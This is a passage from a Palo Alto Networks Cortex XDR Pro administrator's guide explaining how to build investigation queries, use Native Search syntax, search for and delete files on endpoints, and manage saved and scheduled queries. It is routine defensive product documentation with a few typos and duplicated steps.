202 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:

• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create an Image Load Query

From the Query Builder you can investigate connections between image load activity, acting processes, and
endpoints.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 203

© 2020 Palo Alto Networks, Inc.
 Some examples of image load queries you can run include:
• Module load into process events by module path or hash.
To build an image load query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select IMAGE LOAD.

STEP 3 | Enter the search criteria for the image load activity query.
• Type of image activity: All, Image Load, or Change Page Protection.
• Identifying information about the image module: Full Module Path, Module MD5, or Module
SHA256.
By default, Cortex XDR will return the activity that matches all the criteria you specify. To exclude a
value, toggle the = option to =!.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.

204 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:

• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create a Registry Query

From the Query Builder you can investigate connections between registry activity, processes, and
endpoints.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 205

© 2020 Palo Alto Networks, Inc.
 Some examples of registry queries you can run include:
• Modified registry keys on specific endpoints.
• Registry keys related to process activity that exist on specific endpoints.
To build a registry query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select REGISTRY.

STEP 3 | Enter the search criteria for the registry events query.
• Registry action—Select the type or types of registry actions you want to search: Key Create, Key
Delete, Key Rename, Value Set, or Value Delete.
• Registry attributes—Define any additional registry attributes for which you want to search. By
default, Cortex XDR will return the events that match the attribute you specify. To exclude an
attribute value, toggle the = option to =!. Attributes are:
• KEY NAME—Registry key name.
• DATA—Registry key data value.
• REGISTRY FULL KEY—Full registry key path.
• KEY PREVIOUS NAME—Name of the registry key before modification.
• VALUE NAME—Registry value name.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:

• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.

206 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create an Event Log Query

From the Query Builder you can search Windows event log attributes and investigate event logs across
endpoints with an Cortex XDR agent installed.

Some examples of event log queries you can run include:

• Critical level messages on specific endpoints.
• Message descriptions with specific keywords on specific endpoints.
To build a file query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select EVENT LOG.

STEP 3 | Enter the search criteria for your Windows event log query.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 207

© 2020 Palo Alto Networks, Inc.
 Define any event attributes for which you want to search. By default, Cortex XDR will return the events
that match the attribute you specify. To exclude an attribute value, toggle the = option to =!. Attributes
are:
• • PROVIDER NAME—The provider of the event log.
• USERNAME—The username associated with the event.
• EVENT ID—The unique ID of the event.
• LEVEL—The event severity level.
• MESSAGE—The description of the event.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:

• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 5 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 6 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 7 | When you are ready, View the Results of a Query.

STEP 8 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 9 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 10 | When you are ready, View the Results of a Query.

Create a Network Connections Query

From the Query Builder you can investigate network events stitched across endpoints and the Palo Alto
Networks next-generation firewalls logs.

208 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Some examples of network queries you can run include:
• Source and destination of a process.
• Network connections that included a specific App ID
• Processes that created network connections.
• Network connections between specific endpoints.
To build a network query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select NETWORK CONNECTIONS.

STEP 3 | Enter the search criteria for the network events query.
• Network attributes—Define any additional process attributes for which you want to search. Use a
pipe (|) to separate multiple values (for example 80|8080). By default, Cortex XDR will return the
events that match the attribute you specify. To exclude an attribute value, toggle the = option to =!.
Options are:
• APP ID—App ID of the network.
• PROTOCOL—Network transport protocol over which the traffic was sent.
• SESSION STATUS
• FW DEVICE NAME—Firewall device name.
• FW RULE—Firewall rule.
• FW SERIAL ID—Firewall serial ID.
• PRODUCT
• VENDOR
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) To limit the scope to a specific source, click the + to the right of the value and specify
the exception value.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 209

© 2020 Palo Alto Networks, Inc.
 Specify one or more attributes for the source.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• HOST NAME—Name of the source.
• HOST IP—IP address of the source.
• HOST OS—Operating system of the source.
• PROCESS NAME—Name of the process.
• PROCESS PATH—Path to the process.
• CMD—Command-line used to initiate the process including any arguments, up to 128 characters.
• MD5—MD5 hash value of the process.
• SHA256—SHA256 hash value of the process.
• PROCESS USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signature Unavailable, Signed, Invalid Signature,
Unsigned, Revoked, Signature Fail.
• PID—Process ID of the parent process.
• IP—IP address of the process.
• PORT—Port number of the process.
• USER ID—ID of the user who executed the process.
• Run search for both the process and the Causality actor—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that XDR app identified
as being responsible for initiating the process tree. Select this option if you want to apply the same
search criteria to the causality actor. If you clear this option, you can then configure different
attributes for the causality actor.

STEP 5 | (Optional) Limit the scope to a destination.

Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
Specify one or more of the following attributes:
• REMOTE IP—IP address of the destination.
• COUNTRY—Country of the destination.
• Destination TARGET HOST,NAME, PORT, HOST NAME, PROCESS USER NAME, HOST IP, CMD,
HOST OS, MD5, PROCESS PATH, USER ID, SHA256, SIGNATURE, or PID

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create an Authentication Query

From the Query Builder you can investigate authentication activity across all ingested authentication logs
and data.

210 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Some examples of authentication queries you can run include:
• Authentication logs by severity
• Authentication logs by event message
• Authentication logs for a specific source IP address
To build an authentication query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select AUTHENTICATION.

STEP 3 | Enter the search criteria for the authentication query.

By default, Cortex XDR will return the activity that matches all the criteria you specify. To exclude a
value, toggle the = option to =!.

STEP 4 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 5 | When you are ready, View the Results of a Query.

Query Across All Entities

From the Query Builder you can perform a simple search for hosts and processes across all file events,
network events, registry events, process events, and Windows event logs.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 211

© 2020 Palo Alto Networks, Inc.
 Some examples of queries you can run across all entities include:
• All activities on a host
• All activities initiated by a process on a host.
To build a query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select ALL ACTIONS.

STEP 3 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

212 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
STEP 4 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:

• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 5 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 6 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 7 | When you are ready, View the Results of a Query.

Native Search
To search across all available logs and data in Cortex XDR, you can use the text-based Native Search. The
Native Search is available on the top right of the Query Builder.
To facilitate simple and complex text-based queries, you can enter fields based on the log’s metadata
hierarchy (core fields, vendor fields, or log types) the operator, the field value, and the timeframe. For
simplicity, the Native Search provides auto-completion—based on the known log fields—as you type. You
can also use Regex (except for with IP addresses and ranges) and wildcards in your queries and can string
together multiple queries using and or or.

For examples of text-based queries, see Native Search Examples.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 213

© 2020 Palo Alto Networks, Inc.
 Core Fields for Native Search
When you specify core fields without any other search criteria, the Native Search queries the field value
across all data and logs that contain that field type. To further refine the results and specify context, you
can combine core fields with other criteria such as vendor or log type. You can build queries in Native
Search for any of the following core fields:
• ip
• source_ip
• destination_ip
• hash
• host_name
• user_name
• process_name
• process_path
Vendor Fields for Native Search
To search for logs or data from a specific vendor, you can refine your query by vendor and product.
The query fields are hierarchical. To construct a query, separate each field in the hierarchy with periods.
Examples of vendor fields include:
• Search for results from all Palo Alto Networks products—PANW
• Search for results from Cisco ASA firewalls—Cisco.ASA

Vendor Product

PANW NGFW

Cortex Agent

Checkpoint FW1/VPN1

Cisco ASA

Firepower

Okta MFA

Microsoft Azure AD

Corelight Corelight sensor

Fortinet Fortigate

Log Types for Native Search

You can construct queries for the following types of logs and log subtypes.

Log Type Log Subtype

process_actions • process_executed
• process_injected

214 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Log Type Log Subtype

registry_actions • key_created
• key_renamed
• key_deleted
• key_created
• value_set
• value_deleted

file_actions • file_created
• flie_deleted
• file_renamed
• file_written
• file_read

network_connections • outbound_connection
• inbound_connection
• failed_connection

event_logs • endpoint_eventlog
• dc_eventlog

authentication • successful_authentication
• failed_authentication

image_load • image_load_success
• change_page_protection

Operators

Operator Description

= Show results equal to a value

!= Show results that are not equal to a value.

~= Show results that are equal to a Regex pattern

match. Not supported with IP addresses or ranges.

!~= Show results that are not equal to a Regex pattern

match. Not supported with IP addresses or ranges.

contains Show results that contain a value.

not contains Show results that do not contain a value.

in (list, range) Show results including one or more matches in a

list or range. Not supported with IP addresses or
ranges.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 215

© 2020 Palo Alto Networks, Inc.
 Operator Description

not in (list, range) Show results excluding one or more matches in a

list or range. Not supported with IP addresses or
ranges.

Native Search Examples

Search

logtype = file AND subtype IN ("file create", "file delete") and hostname contains SF

network connections AND palo alto networks.app id = facebook

okta.sso AND ip != 10.0.*

palo alto networks.file create.file name =~ ”.+?”

event log AND (palo alto networks.event log id = 41783 OR hostname =~ la^xcortex xdr agent AND palo
alto networks.dst process name CONTAINS chrome

logtype IN ("network connections", execution, injection) AND (palo alto networks.app id = chrome OR
process name = chrome)

ip = 198.51.100.157 AND palo alto

ip = 198.51.100.157 and key.name =~ "\wSomestring\w"

Search for Files on Endpoints

You can use the text-based Native Search to search for files on endpoints. Unlike the Cortex XDR File
Query which queries only the EDR data reported back from the agent, File Search initiates a search on the
endpoint local files database, and can include deleted files as well. You can use file search to search for files
by hash or path, on all your Windows endpoints. File Search is a stand-alone query in Cortex XDR, and you
cannot combine File Search with other queries or core fields in Native Search.

The Cortex XDR agent does not include in the local files inventory the following:
• Information about files that existed on the endpoint and were deleted before the Cortex
XDR agent was installed.
• Information about files where the file size exceeds the maximum file size for hash
calculations that is preconfigured in Cortex XDR.
• If the Agent Settings Profile on the endpoint is configured to monitor common file types
only, then the local files inventory includes information about these file types only. You
cannot search or destroy file types that are not included in the list of common file types.

STEP 1 | From Cortex XDR > Investigation > Query Builder, select Native Search.

STEP 2 | Enter your search query in the following format:

<Action name> <Action mandatory parameters> <Action optional parameter>
• To search for all existing instances of a file:

216 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • <Action name>—find_existing_files
• <Action mandatory parameters>—Search according to file hash or file path (you can
enter the full path, or enter a partial path using ‘*’). For Windows endpoints, the file path must
begin with a drive name, for example: c:\. Additionally, you must specify the exact path folder
hierarchy, for example c:\users\user\file.exe. You must specify the exact path folder
hierarchy also when you replace folder names with wildcards, by using a wildcard for each folder
in the hierarchy. For example, c:\*\*\file.exe
• <Action optional parameter>—You can narrow down the search to a specific host
by adding HOSTNAME = <hostname> or to multiple hosts by adding HOSTNAME in
<hostname1, hostname2>.
For example,

find_existing_files path=c:\windows\system32\ping.exe and hostname=ADI-PC

• To search for all existing and deleted instances of a file:
• <Action name>—find_existing_or_deleted_files
• <Action mandatory parameters>—You can search by file hash only.
• <Action optional parameter>—You can narrow down the search to a specific host
by adding HOSTNAME = <hostname> or to multiple hosts by adding HOSTNAME in
<hostname1, hostname2>.
For example:

find_existing_or_deleted_files
sha256=2867450a7f720c207b95492458c19acc7fe3183a84b4db48b637e65ad816f635
and hostname in PC

STEP 3 | Run the search.

STEP 4 | Review the search results in real-time.

The file search results include the following details: search query, counters indicating the number of
endpoints that were searched, and a detailed list of all the file instances that were found. If not all
endpoints in the query scope are connected or the search has not completed, the search continues and
the search action remains in Pending status in the Action Center.
• The search query syntax.
• Counters indicating the number of connected and disconnected endpoints on which Cortex XDR
performed the search.
• Counters indicating the number of endpoints where the file currently exists and the number of
endpoints where the file does not exist.
• A detailed list of all the file instances that were found in the search.
You can track and manage the search in the Action Center.

STEP 5 | (Optional) Retrieve the file from the endpoint.

Right-click the file and select Get file to upload the file to Cortex XDR for further examination before
you destroy it.

STEP 6 | (Optional) Destroy the file on the endpoint.

When you destroy a file, you permanently remove it. You can destroy the file directly from the search
results. Right-click the file and select Destroy By path or Destroy by hash.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 217

© 2020 Palo Alto Networks, Inc.
Cortex XDR Query Center
From the Query Center you can manage and view the results of all simple and complex queries created
from the Query Builder. The Query Center displays information about the query including the query
parameters and allows you to adjust and rerun queries as needed.

The following table describes the fields that are available for each query in alphabetical order.

Field Description

CREATED BY User who created or scheduled the query.

NUM OF RESULTS Number of results returned by the query.

QUERY DESCRIPTION The query parameters used to run the query.

QUERY ID Unique identifier of the query.

QUERY NAME For saved queries, the Query Name identifies the query specified by
the administrator. For scheduled queries, the Query Name identifies
the auto-generated name of the parent query. Scheduled queries also
display an icon to the left of the name to indicate that the query is
reoccurring.

QUERY STATUS Status of the query:

• Queued—The query is queued and will run when there is an available
slot.

218 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Field Description
• Running
• Failed
• Partially completed—The query was stopped after exceeding the
maximum number of permitted results (100,000). To reduce the
number of results returned, you can adjust the query settings and
rerun.
• Stopped—The query was stopped by an administrator.
• Completed
• Deleted—The query was pruned.

RESULTS SAVED Yes or No.

TIMESTAMP Date and time the query was created.

Manage Your Queries

From the Query Center, you can view all manual and scheduled queries. The Query Center also provides
management functions that allow you to modify, rerun, schedule, and remove queries. You can also refresh
the page to view updated status for queries, filter available queries based on fields in the query table, and
manage the fields presented in the Query Center.

• View the Results of a Query

• Rename a Query
• Modify a Query
• Rerun or Schedule a Query to Run
• Manage Scheduled Queries
View the Results of a Query
After you run a query, you can view the events that match your search criteria. To view the results:

STEP 1 | Select INVESTIGATION > Query Center.

STEP 2 | Locate the query for which you want to view the results.
If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right-click anywhere in the query row, select Show results, and choose whether to open the
query in the same tab or a new tab.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 219

© 2020 Palo Alto Networks, Inc.
STEP 4 | (Optional) If you want to refine your results, you can Modify a query from the query results.

STEP 5 | (Optional) If desired, Export to file to export the results to a tab-separated values (TSV) file.

STEP 6 | (Optional) Perform additional investigation on the alerts.

From the right-click pivot menu:
• Analyze the alert and open the Causality View.
• Investigate in Timeline.
• View event log message to view the event details.

Modify a Query
After you run a query you might find you need to change your search parameters such as to narrow the
search results or correct a search parameter. There are two ways you can modify a query: You can edit it in
the Query Center, or you can edit it from the results page. Both methods populate the criteria you specified
in the original query in a new query which you can modify and save.

• Create a query based on an existing query.

1. Select INVESTIGATION > Query Center.
2. Right click anywhere in the query and then select Save as a new query.
3. If desired, enter a descriptive name to identity the query.
4. Then modify the search parameters as desired.
5. Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in
the Query Center.

• Modify an existing query from the Query Center.

220 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 1. Select INVESTIGATION > Query Center.
2. Right click anywhere in the query and then Edit a query.
3. Modify the search parameters as desired.
4. Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in
the Query Center.

• Modify a query from the query results.

1. View the Results of a Query.
2. At the top of the query, click the pencil icon to the right of the query parameters.
Cortex XDR opens the query settings page.
3. Modify the search parameters as desired.
4. Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query and review the result at a later time, or Run to run the query immediately and view the
results in the Query Center.

Rerun or Schedule a Query to Run

If you want to rerun a query, you can either schedule it to run on or before a specific date, or you can rerun
it immediately. Cortex XDR will create a new query in the Query Center. When the query completes, Cortex
XDR displays a notification in the notification bar.

• Rerun a query immediately.

1. Select INVESTIGATION > Query Center.
2. Right click anywhere in the query and then select Rerun Query.
Cortex XDR initiates the query immediately.

• Schedule a query to run:

1. Select INVESTIGATION > Query Center.
2. Right click anywhere in the query and then select Schedule.
3. Choose the desired schedule option and the date and time the query should run:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 221

© 2020 Palo Alto Networks, Inc.
 • Run one time query on a specific date
• Run query by date and time—Schedule a reoccurring query at a frequency of your choice.
4. Click OK to schedule the query.
Cortex XDR creates a new query and schedules it to run on or by the selected date and time.
5. View the status of the scheduled query on the Cortex XDR Scheduled Queries page.
At any time, you can view or make changes to the query on the Scheduled Queries page. For
example, you can edit the frequency, view when the query will next run, or disable the query.

Rename a Query
If needed, you can rename a query at any time. If you later rerun the query, the new query will run using the
new name. You can also edit the name of a query when you Modify a Query.

STEP 1 | Select INVESTIGATION > Query Center.

STEP 2 | Right click anywhere in the query and then select Rename.

STEP 3 | Enter the new query name and click OK.

Quick Launcher
The Quick Launcher provides a quick, in-context shortcut that you can use to search for information,
perform common investigation tasks, or initiate response actions from any place in the Cortex XDR app. The
tasks that you can perform with the Quick Launcher include:
• Search for host, username, IP address, domain, filename, or filepath, timestamp

For hosts, Cortex XDR displays results for exact matches but supports the use of wildcard
(*) which changes the search to return matches that contain the specified text. For
example a search of compy-7* will return any hosts beginning with compy-7 such as
compy-7000, compy-7abc and so forth.
• Begin Go To mode. Enter forward slash (/) followed by your search string to filter and navigate to Cortex
XDR pages. For example, / rules searches for all pages that include rules and allows you to navigate
to those pages. Select Esc to exit Go To mode.
• Add a processes by SHA256 hash to the allow list or block list
• Add domains or IP addresses to the EDL block list
• Create a new IOC for an IP address, domain, hash, filename, or filepath
• Isolate an endpoint
• Open a terminal to a given endpoint
• Initiate a malware scan on an endpoint
You can bring up the Quick Launcher either using the default keyboard shortcut— Ctrl-Shift+X on
Windows or CMD+Shift+X on macOS—or using the Quick Launcher icon located in the top navigation bar.
To change the default keyboard shortcut, navigate to > Settings > General > Keyboard Shortcuts. The
shortcut value must be a keyboard letter, A through Z, and cannot be the same as the Artifact and Asset
Views defined shortcut.
You can also prepopulate searches in Quick Launcher by selecting text in the app or selecting a node in the
Causality or Timeline Views.
By default, Cortex XDR opens the Quick Launcher in the center of the page. To change the default position,
drag the Quick Launcher to another preferred location. The next time you open the Quick Launcher, it
opens in the previous location. To close the Quick Launcher, click Esc or click out of the Quick Launcher
dialog.

222 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Cortex XDR Scheduled Queries
From the Scheduled Queries page, you can easily view all scheduled and reoccurring queries created from
the Query Builder. The Scheduled Queries page displays information about the query including the query
parameters and allows you to adjust or modify the schedule as needed. To edit a query schedule, right click
the query and select the desired action.

The following table describes the fields that are available for each query in alphabetical order.

Field Description

CREATED BY User who created or scheduled the query.

NEXT EXECUTION Next execution time if the query is scheduled to run at a specific
frequency. If the query was only scheduled to run at a specific time and
date, this field will show None.

QUERY DESCRIPTION The query parameters used to run the query.

QUERY ID Unique identifier of the query.

QUERY NAME For saved queries, the Query Name identifies the query specified by
the administrator. For scheduled queries, the Query Name identifies
the auto-generated name of the parent query. Scheduled queries also
display an icon to the left of the name to indicate that the query is
reoccurring.

SCHEDULE TIME Frequency or time at which the query was scheduled to run.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 223

© 2020 Palo Alto Networks, Inc.
 Field Description

TIMESTAMP Date and time the query was created.

Manage Scheduled Queries

From the Scheduled Queries page, you can perform additional actions to manage your scheduled and
reoccurring queries.

• View Completed Queries

• Edit the Query Frequency
• Disable or Remove a Query
• Rename a Scheduled Query
View Completed Queries
To view completed queries:

STEP 1 | Select INVESTIGATION > Scheduled Queries.

STEP 2 | Locate the scheduled query for which you want to view previous executions.
If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right-click anywhere in the query row, select Show executed queries, and choose whether to
open the query in the same tab or a new tab.
Cortex XDR filters the queries on the Query Center and displays the results in a new window.

Edit the Query Frequency

STEP 1 | Select INVESTIGATION > Scheduled Queries.

STEP 2 | Locate the scheduled query that you want to edit.

If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right click anywhere in the query row and then select Edit.

STEP 4 | Adjust the schedule settings as needed, and then click OK.

Disable or Remove a Query

If you no longer need a query you can temporarily disable or permanently remove it.

STEP 1 | Select INVESTIGATION > Scheduled Queries.

224 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
STEP 2 | Locate the scheduled query that you want to change.
If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right click anywhere in the query row and then select Remove to permanently remove the
scheduled query, or Disable to temporarily stop the query from running at the scheduled time.
If you disable a query you can later return to the Scheduled Queries page and Enable it.

Rename a Scheduled Query

STEP 1 | Select INVESTIGATION > Scheduled Queries.

STEP 2 | Locate the scheduled query that you want to change.

If necessary, use the Filter to reduce the number of queries Cortex XDR displays.

STEP 3 | Right click anywhere in the query row and then select Rename.

STEP 4 | Edit the query name as desired, and then click OK.

Research a Known Threat

This topic describes what steps you can take to investigate a lead. A lead can be:
• An alert from a non-Palo Alto Networks system with information relevant to endpoints or firewalls.
• Information from online articles or other external threat intelligence that provides well-defined
characteristics about the threat.
• Users or hosts that have been reported as acting abnormally.

STEP 1 | Use the threat intelligence you have to build a query using Cortex XDR Query Builder.
For example, if external threat intelligence indicates a confirmed threat that involves specific files or
behaviors, search for those characteristics.

STEP 2 | View the Results of a Queryand refine as needed to filter out noise.
See Modify a Query.

